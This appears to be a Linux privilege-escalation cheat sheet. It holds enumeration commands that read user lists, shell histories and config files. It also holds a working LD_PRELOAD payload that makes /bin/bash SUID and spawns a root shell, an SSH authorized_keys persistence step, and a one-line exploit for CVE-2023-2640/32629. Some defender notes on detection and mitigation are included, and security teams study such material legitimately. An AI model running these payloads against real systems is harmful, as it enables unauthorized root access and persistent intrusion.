Linux Privilege Escalation
Enum tools
Resources
Enum Basics
Currently logged-in user
whoami
Current user groups
id
Machine's hostname
hostname
OS version
cat /etc/os-release
Kernel version
uname -a
cat /proc/version
Sudo version
sudo -V
Additional host info
lscpu
Network interfaces
ifconfig
ip addr
Routing table
netstat -rn
route
Hosts file
cat /etc/hosts
ARP table (other hosts)
arp -a
Drives and shares
lsblk
Mounts
cat /etc/fstab
Mounted file systems
df -h
fstab entries (mounted or not)
cat /etc/fstab | grep -v "#" | column -t
What can we run as root?
sudo -l
Is PATH misconfigured?
echo $PATH
Environment variables
env
Available shells
cat /etc/shells
Existing users
cat /etc/passwd
Existing groups
cat /etc/group
Which users are in the sudo group?
getent group sudo
Logged-in users
w
Last user logins
lastlog
Check bash history
history
Cron
crontab -l
ls -la /etc/cron.daily/
Root processes
ps aux | grep root
Find .sh files
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
Find .bash_history files
find / -type f \( -name '*_hist' -o -name '*_history' \) -exec ls -l {} \; 2>/dev/null
Find configuration files
find / -type f \( -name '*.conf' -o -name '*.config' \) -exec ls -l {} \; 2>/dev/null
Find all writable files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Find all hidden files for user
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep $USER
Find temporary files
ls -l /tmp /var/tmp /dev/shm
Find all writable directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
Find all hidden directories
find / -type d -name ".*" -ls 2>/dev/null
Installed packages
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
Things to look for
- Commands that contain credentials like
mysql -ptest123
get leaked in ps output; use pspy
- Search for hashes/credentials, often in backups or configs
Misc notes
.so loading
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
/*
 * Constructor of a preloaded shared object (the build line below uses
 * -nostartfiles, so this _init runs when the object is loaded). It removes
 * LD_PRELOAD from the environment, switches to gid/uid 0, sets the SUID bit
 * on /bin/bash and then spawns an interactive shell: this is a
 * privilege-escalation payload, not a library.
 *
 * Defender notes: setgid(0)/setuid(0) only succeed if the loading process is
 * already privileged, so the underlying weakness is LD_PRELOAD being honoured
 * in a privileged context (how that happens is not stated on this page —
 * confirm against the target's sudo/env configuration). Detection: a mode
 * change on /bin/bash (auditd watch or file-integrity monitoring on system
 * shells) and a uid-0 interactive shell whose parent is an unprivileged user's
 * session. Mitigation: never let LD_PRELOAD/LD_LIBRARY_PATH survive into
 * privileged execution (sudo env_reset, no LD_* in env_keep). None of the
 * calls below check their return value.
 */
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("chmod u+s /bin/bash");
system("/bin/bash -i");
}
# Builds the shared object defined above.
gcc -fPIC -shared -o extension.so extension.c -nostartfiles
# Once /bin/bash carries the SUID bit, -p keeps the elevated effective uid on start.
# Defender note: a SUID bit on a system shell is never legitimate — alert on it
# (FIM / auditd on chmod of /bin/*sh) and on non-root users invoking `bash -p`.
bash -p
ssh private key
# victim
# Generate a key pair and authorise its public half for the current account.
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
# Host
## copy key to host
# Defender note: an appended authorized_keys entry is persistence. Alert on writes to
# ~/.ssh/authorized_keys (auditd watch / FIM) and diff keys against a known allow-list;
# also review ~/.ssh for freshly generated id_rsa* files on servers where users should
# not be generating keys.
chmod 600 /path/to/id_rsa_custom
ssh -i /path/to/id_rsa_custom user@target_machine_ip
CVEs
CVE-2023-2640 | CVE-2023-32629
# CVE-2023-2640 / CVE-2023-32629 (the Ubuntu OverlayFS privilege-escalation pair).
# Defender notes: fixed by the distribution kernel updates for those CVEs — patch level is
# the primary control. Both variants require an unprivileged user namespace (unshare -rm)
# plus an overlay mount performed by an unprivileged uid; restricting unprivileged user
# namespaces (e.g. kernel.unprivileged_userns_clone=0 on Ubuntu kernels) removes that
# precondition, and `unshare`/`mount -t overlay` from a non-root uid is a strong audit signal.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
# Or
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"